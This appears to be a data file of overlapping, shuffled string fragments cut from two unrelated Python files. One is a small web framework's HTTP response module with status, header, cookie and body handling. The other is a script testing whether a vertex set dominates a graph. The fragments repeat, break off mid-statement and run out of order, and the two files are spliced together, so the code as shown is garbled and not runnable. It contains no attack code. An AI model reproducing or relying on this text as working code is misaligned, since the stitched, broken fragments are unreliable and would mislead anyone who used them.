"status_code, header, body.encode(\"utf-8\") if body is not None else None, content_type=\"text/html\" ) class",
"= value self._header.append(hdr_elem) def set_cookie( self, name, value, **kwards ): hdr_elem = dict()",
"if not isinstance(content_type, str): raise TypeError(\"content_type must be str type.\") if body is",
"subclass must have 5 attributes. - status_code: default 200 - header: default: []",
"must be str type.\") super().__init__( status_code, header, body.encode(\"utf-8\") if body is not None",
"from ._fly_server import _fly_response import json from .cookie import * from .exceptions import",
"name, value, **kwards ): hdr_elem = dict() hdr_elem[\"name\"] = \"Set-Cookie\" value = header_value_from_cookie(name,",
"header attr\" ) @property def body(self): raise NotImplementedError( \"_Response must have body attr\"",
"header_len(self): return len(self._header) @property def body(self): return self._body @property def content_type(self): return self._content_type",
"HTMLResponse(Response): def __init__( self, status_code=200, header=None, body=None, ): if body is not None",
"Response subclass must have 5 attributes. - status_code: default 200 - header: default:",
"hdr_elem[\"name\"] = name hdr_elem[\"value\"] = value self._header.append(hdr_elem) def set_cookie( self, name, value, **kwards",
"value self._header.append(hdr_elem) def set_cookie( self, name, value, **kwards ): hdr_elem = dict() hdr_elem[\"name\"]",
"All Response subclass must have 5 attributes. - status_code: default 200 - header:",
"self._status_code @property def header(self): return self._header @property def header_len(self): return len(self._header) @property def",
"): if body is not None and not isinstance(body, str): raise TypeError(\"body must",
"attr\" ) @property def header_len(self): raise NotImplementedError( \"_Response must have header attr\" )",
"__init__( self, status_code=200, header=None, body=None, ): if body is not None and not",
"must be int type.\") if header is not None and not isinstance(header, (list)):",
"= body if body is not None else bytes() @property def status_code(self): return",
"@property def content_type(self): return self._content_type def add_header(self, name, value): hdr_elem = dict() hdr_elem[\"name\"]",
"raise NotImplementedError( \"_Response must have body attr\" ) @property def content_type(self): raise NotImplementedError(",
"from .exceptions import * class _Response(_fly_response): @property def status_code(self): raise NotImplementedError( \"_Response must",
"return self._header @property def header_len(self): return len(self._header) @property def body(self): return self._body @property",
"body is not None and len(body) > 0 \\ else None, content_type=\"application/json\" )",
"@property def body(self): raise NotImplementedError( \"_Response must have body attr\" ) @property def",
"list/dict type.\") super().__init__( status_code, header, json.dumps(body).encode(\"utf-8\") \\ if body is not None and",
".cookie import * from .exceptions import * class _Response(_fly_response): @property def status_code(self): raise",
"header, json.dumps(body).encode(\"utf-8\") \\ if body is not None and len(body) > 0 \\",
"): if not isinstance(status_code, int): raise TypeError(\"status_code must be int type.\") if header",
"isinstance(status_code, int): raise TypeError(\"status_code must be int type.\") if header is not None",
"**kwards) hdr_elem[\"value\"] = value self._header.append(hdr_elem) class PlainResponse(Response): def __init__( self, status_code=200, header=None, body=None,",
"TypeError(\"body must be list/dict type.\") super().__init__( status_code, header, json.dumps(body).encode(\"utf-8\") \\ if body is",
"TypeError(\"status_code must be list type.\") if not isinstance(content_type, str): raise TypeError(\"content_type must be",
"def content_type(self): raise NotImplementedError( \"_Response must have content_type attr\" ) class Response(_Response): \"\"\"",
"@property def status_code(self): return self._status_code @property def header(self): return self._header @property def header_len(self):",
"must be list/dict type.\") super().__init__( status_code, header, json.dumps(body).encode(\"utf-8\") \\ if body is not",
"def body(self): return self._body @property def content_type(self): return self._content_type def add_header(self, name, value):",
"not isinstance(body, (bytes)): raise TypeError(\"body must be bytes type.\") self._status_code = status_code self._content_type",
"def header_len(self): raise NotImplementedError( \"_Response must have header attr\" ) @property def body(self):",
"else None, content_type=\"text/html\" ) class JSONResponse(Response): def __init__( self, status_code=200, header=None, body=None, ):",
"def __init__( self, status_code=200, header=None, body=None, ): if body is not None and",
"header=None, body=None, ): if body is not None and not isinstance(body, str): raise",
"status_code(self): return self._status_code @property def header(self): return self._header @property def header_len(self): return len(self._header)",
"None and not isinstance(body, str): raise TypeError(\"body must be str type.\") super().__init__( status_code,",
"= list() self._body = body if body is not None else bytes() @property",
"class PlainResponse(Response): def __init__( self, status_code=200, header=None, body=None, ): if body is not",
"None, content_type=\"text/html\" ) class JSONResponse(Response): def __init__( self, status_code=200, header=None, body=None, ): if",
"not None and not isinstance(body, dict) and \\ not isinstance(body, list): raise TypeError(\"body",
"(list)): raise TypeError(\"status_code must be list type.\") if not isinstance(content_type, str): raise TypeError(\"content_type",
"None else None, content_type=\"text/html\" ) class JSONResponse(Response): def __init__( self, status_code=200, header=None, body=None,",
"default 200 - header: default: [] - body: default: bytes() - content_type: default:",
"content_type self._header = list() self._body = body if body is not None else",
"self._header.append(hdr_elem) def set_cookie( self, name, value, **kwards ): hdr_elem = dict() hdr_elem[\"name\"] =",
"body is not None and not isinstance(body, dict) and \\ not isinstance(body, list):",
"return len(self._header) @property def body(self): return self._body @property def content_type(self): return self._content_type def",
"value, **kwards) hdr_elem[\"value\"] = value self._header.append(hdr_elem) class PlainResponse(Response): def __init__( self, status_code=200, header=None,",
"def content_type(self): return self._content_type def add_header(self, name, value): hdr_elem = dict() hdr_elem[\"name\"] =",
"return self._status_code @property def header(self): return self._header @property def header_len(self): return len(self._header) @property",
"json from .cookie import * from .exceptions import * class _Response(_fly_response): @property def",
"status_code attr\" ) @property def header(self): raise NotImplementedError( \"_Response must have header attr\"",
"NotImplementedError( \"_Response must have header attr\" ) @property def header_len(self): raise NotImplementedError( \"_Response",
"dict) and \\ not isinstance(body, list): raise TypeError(\"body must be list/dict type.\") super().__init__(",
"status_code, header, body.encode(\"utf-8\") if isinstance(body, str) else None, content_type=\"text/plain\" ) class HTMLResponse(Response): def",
"and \\ not isinstance(body, list): raise TypeError(\"body must be list/dict type.\") super().__init__( status_code,",
"must have header attr\" ) @property def header_len(self): raise NotImplementedError( \"_Response must have",
"- status_code: default 200 - header: default: [] - body: default: bytes() -",
"value = header_value_from_cookie(name, value, **kwards) hdr_elem[\"value\"] = value self._header.append(hdr_elem) class PlainResponse(Response): def __init__(",
"attr\" ) @property def body(self): raise NotImplementedError( \"_Response must have body attr\" )",
"class _Response(_fly_response): @property def status_code(self): raise NotImplementedError( \"_Response must have status_code attr\" )",
"header: default: [] - body: default: bytes() - content_type: default: text/plain \"\"\" def",
"and not isinstance(body, (bytes)): raise TypeError(\"body must be bytes type.\") self._status_code = status_code",
") class HTMLResponse(Response): def __init__( self, status_code=200, header=None, body=None, ): if body is",
"NotImplementedError( \"_Response must have content_type attr\" ) class Response(_Response): \"\"\" All Response subclass",
"body=None, content_type=\"text/plain\", ): if not isinstance(status_code, int): raise TypeError(\"status_code must be int type.\")",
"\\ not isinstance(body, list): raise TypeError(\"body must be list/dict type.\") super().__init__( status_code, header,",
") @property def header(self): raise NotImplementedError( \"_Response must have header attr\" ) @property",
"return self._content_type def add_header(self, name, value): hdr_elem = dict() hdr_elem[\"name\"] = name hdr_elem[\"value\"]",
"body is not None else bytes() @property def status_code(self): return self._status_code @property def",
"must have content_type attr\" ) class Response(_Response): \"\"\" All Response subclass must have",
"isinstance(body, str) else None, content_type=\"text/plain\" ) class HTMLResponse(Response): def __init__( self, status_code=200, header=None,",
"list() self._body = body if body is not None else bytes() @property def",
"\"Set-Cookie\" value = header_value_from_cookie(name, value, **kwards) hdr_elem[\"value\"] = value self._header.append(hdr_elem) class PlainResponse(Response): def",
"def header_len(self): return len(self._header) @property def body(self): return self._body @property def content_type(self): return",
"dict() hdr_elem[\"name\"] = name hdr_elem[\"value\"] = value self._header.append(hdr_elem) def set_cookie( self, name, value,",
"default: text/plain \"\"\" def __init__( self, status_code=200, header=None, body=None, content_type=\"text/plain\", ): if not",
"<filename>fly/response.py from ._fly_server import _fly_response import json from .cookie import * from .exceptions",
"def set_cookie( self, name, value, **kwards ): hdr_elem = dict() hdr_elem[\"name\"] = \"Set-Cookie\"",
"content_type=\"text/plain\" ) class HTMLResponse(Response): def __init__( self, status_code=200, header=None, body=None, ): if body",
"body is not None and not isinstance(body, (bytes)): raise TypeError(\"body must be bytes",
"add_header(self, name, value): hdr_elem = dict() hdr_elem[\"name\"] = name hdr_elem[\"value\"] = value self._header.append(hdr_elem)",
"must be str type.\") super().__init__( status_code, header, body.encode(\"utf-8\") if isinstance(body, str) else None,",
"self, status_code=200, header=None, body=None, ): if body is not None and not isinstance(body,",
"be list type.\") if not isinstance(content_type, str): raise TypeError(\"content_type must be str type.\")",
"hdr_elem = dict() hdr_elem[\"name\"] = name hdr_elem[\"value\"] = value self._header.append(hdr_elem) def set_cookie( self,",
"def __init__( self, status_code=200, header=None, body=None, content_type=\"text/plain\", ): if not isinstance(status_code, int): raise",
"self._header.append(hdr_elem) class PlainResponse(Response): def __init__( self, status_code=200, header=None, body=None, ): if body is",
"default: [] - body: default: bytes() - content_type: default: text/plain \"\"\" def __init__(",
"- content_type: default: text/plain \"\"\" def __init__( self, status_code=200, header=None, body=None, content_type=\"text/plain\", ):",
"= dict() hdr_elem[\"name\"] = \"Set-Cookie\" value = header_value_from_cookie(name, value, **kwards) hdr_elem[\"value\"] = value",
"not isinstance(header, (list)): raise TypeError(\"status_code must be list type.\") if not isinstance(content_type, str):",
"if body is not None else None, content_type=\"text/html\" ) class JSONResponse(Response): def __init__(",
"str) else None, content_type=\"text/plain\" ) class HTMLResponse(Response): def __init__( self, status_code=200, header=None, body=None,",
"body attr\" ) @property def content_type(self): raise NotImplementedError( \"_Response must have content_type attr\"",
"= status_code self._content_type = content_type self._header = list() self._body = body if body",
"if body is not None and not isinstance(body, dict) and \\ not isinstance(body,",
"raise TypeError(\"content_type must be str type.\") if body is not None and not",
"str type.\") super().__init__( status_code, header, body.encode(\"utf-8\") if body is not None else None,",
"str): raise TypeError(\"body must be str type.\") super().__init__( status_code, header, body.encode(\"utf-8\") if isinstance(body,",
"- header: default: [] - body: default: bytes() - content_type: default: text/plain \"\"\"",
"isinstance(body, (bytes)): raise TypeError(\"body must be bytes type.\") self._status_code = status_code self._content_type =",
"status_code=200, header=None, body=None, content_type=\"text/plain\", ): if not isinstance(status_code, int): raise TypeError(\"status_code must be",
"None else bytes() @property def status_code(self): return self._status_code @property def header(self): return self._header",
"value, **kwards ): hdr_elem = dict() hdr_elem[\"name\"] = \"Set-Cookie\" value = header_value_from_cookie(name, value,",
"raise TypeError(\"body must be bytes type.\") self._status_code = status_code self._content_type = content_type self._header",
"attr\" ) @property def header(self): raise NotImplementedError( \"_Response must have header attr\" )",
"def add_header(self, name, value): hdr_elem = dict() hdr_elem[\"name\"] = name hdr_elem[\"value\"] = value",
"content_type(self): return self._content_type def add_header(self, name, value): hdr_elem = dict() hdr_elem[\"name\"] = name",
"be bytes type.\") self._status_code = status_code self._content_type = content_type self._header = list() self._body",
"= name hdr_elem[\"value\"] = value self._header.append(hdr_elem) def set_cookie( self, name, value, **kwards ):",
"be str type.\") if body is not None and not isinstance(body, (bytes)): raise",
"header_value_from_cookie(name, value, **kwards) hdr_elem[\"value\"] = value self._header.append(hdr_elem) class PlainResponse(Response): def __init__( self, status_code=200,",
"not None and not isinstance(body, str): raise TypeError(\"body must be str type.\") super().__init__(",
"\"\"\" def __init__( self, status_code=200, header=None, body=None, content_type=\"text/plain\", ): if not isinstance(status_code, int):",
"list): raise TypeError(\"body must be list/dict type.\") super().__init__( status_code, header, json.dumps(body).encode(\"utf-8\") \\ if",
"__init__( self, status_code=200, header=None, body=None, content_type=\"text/plain\", ): if not isinstance(status_code, int): raise TypeError(\"status_code",
"int): raise TypeError(\"status_code must be int type.\") if header is not None and",
"and not isinstance(body, str): raise TypeError(\"body must be str type.\") super().__init__( status_code, header,",
"super().__init__( status_code, header, json.dumps(body).encode(\"utf-8\") \\ if body is not None and len(body) >",
"TypeError(\"content_type must be str type.\") if body is not None and not isinstance(body,",
"not None else None, content_type=\"text/html\" ) class JSONResponse(Response): def __init__( self, status_code=200, header=None,",
"\"_Response must have header attr\" ) @property def header_len(self): raise NotImplementedError( \"_Response must",
"have content_type attr\" ) class Response(_Response): \"\"\" All Response subclass must have 5",
"hdr_elem[\"value\"] = value self._header.append(hdr_elem) class PlainResponse(Response): def __init__( self, status_code=200, header=None, body=None, ):",
"_fly_response import json from .cookie import * from .exceptions import * class _Response(_fly_response):",
"self._status_code = status_code self._content_type = content_type self._header = list() self._body = body if",
"not isinstance(body, list): raise TypeError(\"body must be list/dict type.\") super().__init__( status_code, header, json.dumps(body).encode(\"utf-8\")",
"JSONResponse(Response): def __init__( self, status_code=200, header=None, body=None, ): if body is not None",
"header(self): return self._header @property def header_len(self): return len(self._header) @property def body(self): return self._body",
"= header_value_from_cookie(name, value, **kwards) hdr_elem[\"value\"] = value self._header.append(hdr_elem) class PlainResponse(Response): def __init__( self,",
"@property def status_code(self): raise NotImplementedError( \"_Response must have status_code attr\" ) @property def",
"must have status_code attr\" ) @property def header(self): raise NotImplementedError( \"_Response must have",
"type.\") if body is not None and not isinstance(body, (bytes)): raise TypeError(\"body must",
"import * from .exceptions import * class _Response(_fly_response): @property def status_code(self): raise NotImplementedError(",
"5 attributes. - status_code: default 200 - header: default: [] - body: default:",
"header attr\" ) @property def header_len(self): raise NotImplementedError( \"_Response must have header attr\"",
"else bytes() @property def status_code(self): return self._status_code @property def header(self): return self._header @property",
"have status_code attr\" ) @property def header(self): raise NotImplementedError( \"_Response must have header",
"@property def body(self): return self._body @property def content_type(self): return self._content_type def add_header(self, name,",
"be str type.\") super().__init__( status_code, header, body.encode(\"utf-8\") if isinstance(body, str) else None, content_type=\"text/plain\"",
"content_type=\"text/html\" ) class JSONResponse(Response): def __init__( self, status_code=200, header=None, body=None, ): if body",
"body: default: bytes() - content_type: default: text/plain \"\"\" def __init__( self, status_code=200, header=None,",
"super().__init__( status_code, header, body.encode(\"utf-8\") if body is not None else None, content_type=\"text/html\" )",
"dict() hdr_elem[\"name\"] = \"Set-Cookie\" value = header_value_from_cookie(name, value, **kwards) hdr_elem[\"value\"] = value self._header.append(hdr_elem)",
"name hdr_elem[\"value\"] = value self._header.append(hdr_elem) def set_cookie( self, name, value, **kwards ): hdr_elem",
"def header(self): return self._header @property def header_len(self): return len(self._header) @property def body(self): return",
"header is not None and not isinstance(header, (list)): raise TypeError(\"status_code must be list",
"str): raise TypeError(\"body must be str type.\") super().__init__( status_code, header, body.encode(\"utf-8\") if body",
"body(self): return self._body @property def content_type(self): return self._content_type def add_header(self, name, value): hdr_elem",
"content_type attr\" ) class Response(_Response): \"\"\" All Response subclass must have 5 attributes.",
"TypeError(\"body must be str type.\") super().__init__( status_code, header, body.encode(\"utf-8\") if isinstance(body, str) else",
"class HTMLResponse(Response): def __init__( self, status_code=200, header=None, body=None, ): if body is not",
"._fly_server import _fly_response import json from .cookie import * from .exceptions import *",
"attr\" ) @property def content_type(self): raise NotImplementedError( \"_Response must have content_type attr\" )",
".exceptions import * class _Response(_fly_response): @property def status_code(self): raise NotImplementedError( \"_Response must have",
"type.\") super().__init__( status_code, header, body.encode(\"utf-8\") if isinstance(body, str) else None, content_type=\"text/plain\" ) class",
"is not None and not isinstance(body, (bytes)): raise TypeError(\"body must be bytes type.\")",
"body=None, ): if body is not None and not isinstance(body, dict) and \\",
"NotImplementedError( \"_Response must have header attr\" ) @property def body(self): raise NotImplementedError( \"_Response",
"@property def header(self): return self._header @property def header_len(self): return len(self._header) @property def body(self):",
"type.\") super().__init__( status_code, header, body.encode(\"utf-8\") if body is not None else None, content_type=\"text/html\"",
"content_type: default: text/plain \"\"\" def __init__( self, status_code=200, header=None, body=None, content_type=\"text/plain\", ): if",
"= content_type self._header = list() self._body = body if body is not None",
"default: bytes() - content_type: default: text/plain \"\"\" def __init__( self, status_code=200, header=None, body=None,",
"have body attr\" ) @property def content_type(self): raise NotImplementedError( \"_Response must have content_type",
"not isinstance(content_type, str): raise TypeError(\"content_type must be str type.\") if body is not",
"class JSONResponse(Response): def __init__( self, status_code=200, header=None, body=None, ): if body is not",
"list type.\") if not isinstance(content_type, str): raise TypeError(\"content_type must be str type.\") if",
"isinstance(content_type, str): raise TypeError(\"content_type must be str type.\") if body is not None",
"[] - body: default: bytes() - content_type: default: text/plain \"\"\" def __init__( self,",
"raise NotImplementedError( \"_Response must have content_type attr\" ) class Response(_Response): \"\"\" All Response",
"else None, content_type=\"text/plain\" ) class HTMLResponse(Response): def __init__( self, status_code=200, header=None, body=None, ):",
"be int type.\") if header is not None and not isinstance(header, (list)): raise",
"PlainResponse(Response): def __init__( self, status_code=200, header=None, body=None, ): if body is not None",
"attributes. - status_code: default 200 - header: default: [] - body: default: bytes()",
"raise TypeError(\"body must be list/dict type.\") super().__init__( status_code, header, json.dumps(body).encode(\"utf-8\") \\ if body",
"not isinstance(status_code, int): raise TypeError(\"status_code must be int type.\") if header is not",
"\"_Response must have header attr\" ) @property def body(self): raise NotImplementedError( \"_Response must",
"(bytes)): raise TypeError(\"body must be bytes type.\") self._status_code = status_code self._content_type = content_type",
"status_code=200, header=None, body=None, ): if body is not None and not isinstance(body, dict)",
"self._body @property def content_type(self): return self._content_type def add_header(self, name, value): hdr_elem = dict()",
"must have body attr\" ) @property def content_type(self): raise NotImplementedError( \"_Response must have",
"TypeError(\"body must be bytes type.\") self._status_code = status_code self._content_type = content_type self._header =",
"type.\") if not isinstance(content_type, str): raise TypeError(\"content_type must be str type.\") if body",
") @property def body(self): raise NotImplementedError( \"_Response must have body attr\" ) @property",
") class Response(_Response): \"\"\" All Response subclass must have 5 attributes. - status_code:",
"be list/dict type.\") super().__init__( status_code, header, json.dumps(body).encode(\"utf-8\") \\ if body is not None",
"type.\") super().__init__( status_code, header, json.dumps(body).encode(\"utf-8\") \\ if body is not None and len(body)",
"type.\") if header is not None and not isinstance(header, (list)): raise TypeError(\"status_code must",
"body is not None else None, content_type=\"text/html\" ) class JSONResponse(Response): def __init__( self,",
"self._header @property def header_len(self): return len(self._header) @property def body(self): return self._body @property def",
"None and not isinstance(body, dict) and \\ not isinstance(body, list): raise TypeError(\"body must",
"raise NotImplementedError( \"_Response must have header attr\" ) @property def body(self): raise NotImplementedError(",
"body is not None and not isinstance(body, str): raise TypeError(\"body must be str",
"TypeError(\"body must be str type.\") super().__init__( status_code, header, body.encode(\"utf-8\") if body is not",
"and not isinstance(body, dict) and \\ not isinstance(body, list): raise TypeError(\"body must be",
"= \"Set-Cookie\" value = header_value_from_cookie(name, value, **kwards) hdr_elem[\"value\"] = value self._header.append(hdr_elem) class PlainResponse(Response):",
"- body: default: bytes() - content_type: default: text/plain \"\"\" def __init__( self, status_code=200,",
"raise TypeError(\"status_code must be int type.\") if header is not None and not",
"None, content_type=\"text/plain\" ) class HTMLResponse(Response): def __init__( self, status_code=200, header=None, body=None, ): if",
"isinstance(body, list): raise TypeError(\"body must be list/dict type.\") super().__init__( status_code, header, json.dumps(body).encode(\"utf-8\") \\",
"status_code=200, header=None, body=None, ): if body is not None and not isinstance(body, str):",
"if isinstance(body, str) else None, content_type=\"text/plain\" ) class HTMLResponse(Response): def __init__( self, status_code=200,",
"and not isinstance(header, (list)): raise TypeError(\"status_code must be list type.\") if not isinstance(content_type,",
"import * class _Response(_fly_response): @property def status_code(self): raise NotImplementedError( \"_Response must have status_code",
"**kwards ): hdr_elem = dict() hdr_elem[\"name\"] = \"Set-Cookie\" value = header_value_from_cookie(name, value, **kwards)",
"isinstance(body, dict) and \\ not isinstance(body, list): raise TypeError(\"body must be list/dict type.\")",
"if header is not None and not isinstance(header, (list)): raise TypeError(\"status_code must be",
"body=None, ): if body is not None and not isinstance(body, str): raise TypeError(\"body",
"self._header = list() self._body = body if body is not None else bytes()",
"raise TypeError(\"status_code must be list type.\") if not isinstance(content_type, str): raise TypeError(\"content_type must",
"str type.\") if body is not None and not isinstance(body, (bytes)): raise TypeError(\"body",
"if body is not None and not isinstance(body, (bytes)): raise TypeError(\"body must be",
"_Response(_fly_response): @property def status_code(self): raise NotImplementedError( \"_Response must have status_code attr\" ) @property",
") @property def content_type(self): raise NotImplementedError( \"_Response must have content_type attr\" ) class",
"bytes() @property def status_code(self): return self._status_code @property def header(self): return self._header @property def",
"self._content_type = content_type self._header = list() self._body = body if body is not",
"self._content_type def add_header(self, name, value): hdr_elem = dict() hdr_elem[\"name\"] = name hdr_elem[\"value\"] =",
"content_type(self): raise NotImplementedError( \"_Response must have content_type attr\" ) class Response(_Response): \"\"\" All",
"None and not isinstance(header, (list)): raise TypeError(\"status_code must be list type.\") if not",
"hdr_elem[\"value\"] = value self._header.append(hdr_elem) def set_cookie( self, name, value, **kwards ): hdr_elem =",
"is not None and not isinstance(body, dict) and \\ not isinstance(body, list): raise",
"@property def header_len(self): return len(self._header) @property def body(self): return self._body @property def content_type(self):",
"status_code self._content_type = content_type self._header = list() self._body = body if body is",
"\"_Response must have body attr\" ) @property def content_type(self): raise NotImplementedError( \"_Response must",
"* class _Response(_fly_response): @property def status_code(self): raise NotImplementedError( \"_Response must have status_code attr\"",
"= value self._header.append(hdr_elem) class PlainResponse(Response): def __init__( self, status_code=200, header=None, body=None, ): if",
"not None and not isinstance(header, (list)): raise TypeError(\"status_code must be list type.\") if",
"header, body.encode(\"utf-8\") if body is not None else None, content_type=\"text/html\" ) class JSONResponse(Response):",
"raise NotImplementedError( \"_Response must have status_code attr\" ) @property def header(self): raise NotImplementedError(",
"not isinstance(body, dict) and \\ not isinstance(body, list): raise TypeError(\"body must be list/dict",
"status_code, header, json.dumps(body).encode(\"utf-8\") \\ if body is not None and len(body) > 0",
"must be str type.\") if body is not None and not isinstance(body, (bytes)):",
"bytes() - content_type: default: text/plain \"\"\" def __init__( self, status_code=200, header=None, body=None, content_type=\"text/plain\",",
"= dict() hdr_elem[\"name\"] = name hdr_elem[\"value\"] = value self._header.append(hdr_elem) def set_cookie( self, name,"
"if (S[i] in NAV): NAV.remove(S[i]) return NAV def Flatten(L): Flat=[] for sub in",
"1): NA.append(i) i=i-1 return GetNonAdjacents(V,NA,i,s) if __name__ == \"__main__\": A=[ [0,1,1,0,0], [1,0,1,1,0], [1,1,0,0,1],",
"(S[i] in NAV): NAV.remove(S[i]) return NAV def Flatten(L): Flat=[] for sub in L:",
"(v1==v2): return False return A[v1][v2] == 1 def GetNonAdjacents(V,NA,i,s): if (i==-1): return NA",
"for j in range(len(S)): is_adj=IsAdjacent(A,S[j],NAV[i]) if (is_adj is True): any_adj=True if (any_adj is",
"A[v1][v2] == 1 def GetNonAdjacents(V,NA,i,s): if (i==-1): return NA cell=V[i] if (i !=s",
"True def RemoveS(NAV,S): NAV=Flatten(NAV) for i in range(len(S)): if (S[i] in NAV): NAV.remove(S[i])",
"def Check(A,S,NAV): for i in range(len(NAV)): any_adj=False for j in range(len(S)): is_adj=IsAdjacent(A,S[j],NAV[i]) if",
"i in range(len(NAV)): any_adj=False for j in range(len(S)): is_adj=IsAdjacent(A,S[j],NAV[i]) if (is_adj is True):",
"sub: Flat.append(val) return Flat def IsAdjacent(A,v1,v2): if (v1==v2): return False return A[v1][v2] ==",
"for i in range(len(S)): dominator=S[i] vertex=A[dominator] NA=GetNonAdjacents(vertex,[],len(vertex)-1,dominator) NAV.append(NA) ToCheck=RemoveS(NAV,S) return Check(A,S,ToCheck) def Check(A,S,NAV):",
"def Flatten(L): Flat=[] for sub in L: for val in sub: Flat.append(val) return",
"<filename>dominating_set_testing.py<gh_stars>1-10 def IsDominatingSet(A,S): NAV=[] for i in range(len(S)): dominator=S[i] vertex=A[dominator] NA=GetNonAdjacents(vertex,[],len(vertex)-1,dominator) NAV.append(NA) ToCheck=RemoveS(NAV,S)",
"NAV): NAV.remove(S[i]) return NAV def Flatten(L): Flat=[] for sub in L: for val",
"range(len(S)): is_adj=IsAdjacent(A,S[j],NAV[i]) if (is_adj is True): any_adj=True if (any_adj is False): return False",
"is_adj=IsAdjacent(A,S[j],NAV[i]) if (is_adj is True): any_adj=True if (any_adj is False): return False return",
"and cell != 1): NA.append(i) i=i-1 return GetNonAdjacents(V,NA,i,s) if __name__ == \"__main__\": A=[",
"cell != 1): NA.append(i) i=i-1 return GetNonAdjacents(V,NA,i,s) if __name__ == \"__main__\": A=[ [0,1,1,0,0],",
"j in range(len(S)): is_adj=IsAdjacent(A,S[j],NAV[i]) if (is_adj is True): any_adj=True if (any_adj is False):",
"in sub: Flat.append(val) return Flat def IsAdjacent(A,v1,v2): if (v1==v2): return False return A[v1][v2]",
"ToCheck=RemoveS(NAV,S) return Check(A,S,ToCheck) def Check(A,S,NAV): for i in range(len(NAV)): any_adj=False for j in",
"NA cell=V[i] if (i !=s and cell != 1): NA.append(i) i=i-1 return GetNonAdjacents(V,NA,i,s)",
"range(len(NAV)): any_adj=False for j in range(len(S)): is_adj=IsAdjacent(A,S[j],NAV[i]) if (is_adj is True): any_adj=True if",
"False): return False return True def RemoveS(NAV,S): NAV=Flatten(NAV) for i in range(len(S)): if",
"if (is_adj is True): any_adj=True if (any_adj is False): return False return True",
"def IsDominatingSet(A,S): NAV=[] for i in range(len(S)): dominator=S[i] vertex=A[dominator] NA=GetNonAdjacents(vertex,[],len(vertex)-1,dominator) NAV.append(NA) ToCheck=RemoveS(NAV,S) return",
"True): any_adj=True if (any_adj is False): return False return True def RemoveS(NAV,S): NAV=Flatten(NAV)",
"i in range(len(S)): if (S[i] in NAV): NAV.remove(S[i]) return NAV def Flatten(L): Flat=[]",
"Check(A,S,NAV): for i in range(len(NAV)): any_adj=False for j in range(len(S)): is_adj=IsAdjacent(A,S[j],NAV[i]) if (is_adj",
"def IsAdjacent(A,v1,v2): if (v1==v2): return False return A[v1][v2] == 1 def GetNonAdjacents(V,NA,i,s): if",
"if (i !=s and cell != 1): NA.append(i) i=i-1 return GetNonAdjacents(V,NA,i,s) if __name__",
"Check(A,S,ToCheck) def Check(A,S,NAV): for i in range(len(NAV)): any_adj=False for j in range(len(S)): is_adj=IsAdjacent(A,S[j],NAV[i])",
"NAV.append(NA) ToCheck=RemoveS(NAV,S) return Check(A,S,ToCheck) def Check(A,S,NAV): for i in range(len(NAV)): any_adj=False for j",
"!=s and cell != 1): NA.append(i) i=i-1 return GetNonAdjacents(V,NA,i,s) if __name__ == \"__main__\":",
"in NAV): NAV.remove(S[i]) return NAV def Flatten(L): Flat=[] for sub in L: for",
"is True): any_adj=True if (any_adj is False): return False return True def RemoveS(NAV,S):",
"False return A[v1][v2] == 1 def GetNonAdjacents(V,NA,i,s): if (i==-1): return NA cell=V[i] if",
"in range(len(S)): if (S[i] in NAV): NAV.remove(S[i]) return NAV def Flatten(L): Flat=[] for",
"L: for val in sub: Flat.append(val) return Flat def IsAdjacent(A,v1,v2): if (v1==v2): return",
"in L: for val in sub: Flat.append(val) return Flat def IsAdjacent(A,v1,v2): if (v1==v2):",
"if (any_adj is False): return False return True def RemoveS(NAV,S): NAV=Flatten(NAV) for i",
"return Flat def IsAdjacent(A,v1,v2): if (v1==v2): return False return A[v1][v2] == 1 def",
"vertex=A[dominator] NA=GetNonAdjacents(vertex,[],len(vertex)-1,dominator) NAV.append(NA) ToCheck=RemoveS(NAV,S) return Check(A,S,ToCheck) def Check(A,S,NAV): for i in range(len(NAV)): any_adj=False",
"in range(len(S)): is_adj=IsAdjacent(A,S[j],NAV[i]) if (is_adj is True): any_adj=True if (any_adj is False): return",
"if (i==-1): return NA cell=V[i] if (i !=s and cell != 1): NA.append(i)",
"(i==-1): return NA cell=V[i] if (i !=s and cell != 1): NA.append(i) i=i-1",
"in range(len(S)): dominator=S[i] vertex=A[dominator] NA=GetNonAdjacents(vertex,[],len(vertex)-1,dominator) NAV.append(NA) ToCheck=RemoveS(NAV,S) return Check(A,S,ToCheck) def Check(A,S,NAV): for i",
"if (v1==v2): return False return A[v1][v2] == 1 def GetNonAdjacents(V,NA,i,s): if (i==-1): return",
"cell=V[i] if (i !=s and cell != 1): NA.append(i) i=i-1 return GetNonAdjacents(V,NA,i,s) if",
"(i !=s and cell != 1): NA.append(i) i=i-1 return GetNonAdjacents(V,NA,i,s) if __name__ ==",
"return Check(A,S,ToCheck) def Check(A,S,NAV): for i in range(len(NAV)): any_adj=False for j in range(len(S)):",
"val in sub: Flat.append(val) return Flat def IsAdjacent(A,v1,v2): if (v1==v2): return False return",
"IsDominatingSet(A,S): NAV=[] for i in range(len(S)): dominator=S[i] vertex=A[dominator] NA=GetNonAdjacents(vertex,[],len(vertex)-1,dominator) NAV.append(NA) ToCheck=RemoveS(NAV,S) return Check(A,S,ToCheck)",
"NAV=[] for i in range(len(S)): dominator=S[i] vertex=A[dominator] NA=GetNonAdjacents(vertex,[],len(vertex)-1,dominator) NAV.append(NA) ToCheck=RemoveS(NAV,S) return Check(A,S,ToCheck) def",
"for i in range(len(S)): if (S[i] in NAV): NAV.remove(S[i]) return NAV def Flatten(L):",
"1 def GetNonAdjacents(V,NA,i,s): if (i==-1): return NA cell=V[i] if (i !=s and cell",
"for i in range(len(NAV)): any_adj=False for j in range(len(S)): is_adj=IsAdjacent(A,S[j],NAV[i]) if (is_adj is",
"def GetNonAdjacents(V,NA,i,s): if (i==-1): return NA cell=V[i] if (i !=s and cell !=",
"(is_adj is True): any_adj=True if (any_adj is False): return False return True def",
"return NAV def Flatten(L): Flat=[] for sub in L: for val in sub:",
"False return True def RemoveS(NAV,S): NAV=Flatten(NAV) for i in range(len(S)): if (S[i] in",
"for val in sub: Flat.append(val) return Flat def IsAdjacent(A,v1,v2): if (v1==v2): return False",
"i=i-1 return GetNonAdjacents(V,NA,i,s) if __name__ == \"__main__\": A=[ [0,1,1,0,0], [1,0,1,1,0], [1,1,0,0,1], [0,1,0,0,1], [0,0,1,1,0]]",
"for sub in L: for val in sub: Flat.append(val) return Flat def IsAdjacent(A,v1,v2):",
"NA.append(i) i=i-1 return GetNonAdjacents(V,NA,i,s) if __name__ == \"__main__\": A=[ [0,1,1,0,0], [1,0,1,1,0], [1,1,0,0,1], [0,1,0,0,1],",
"is False): return False return True def RemoveS(NAV,S): NAV=Flatten(NAV) for i in range(len(S)):",
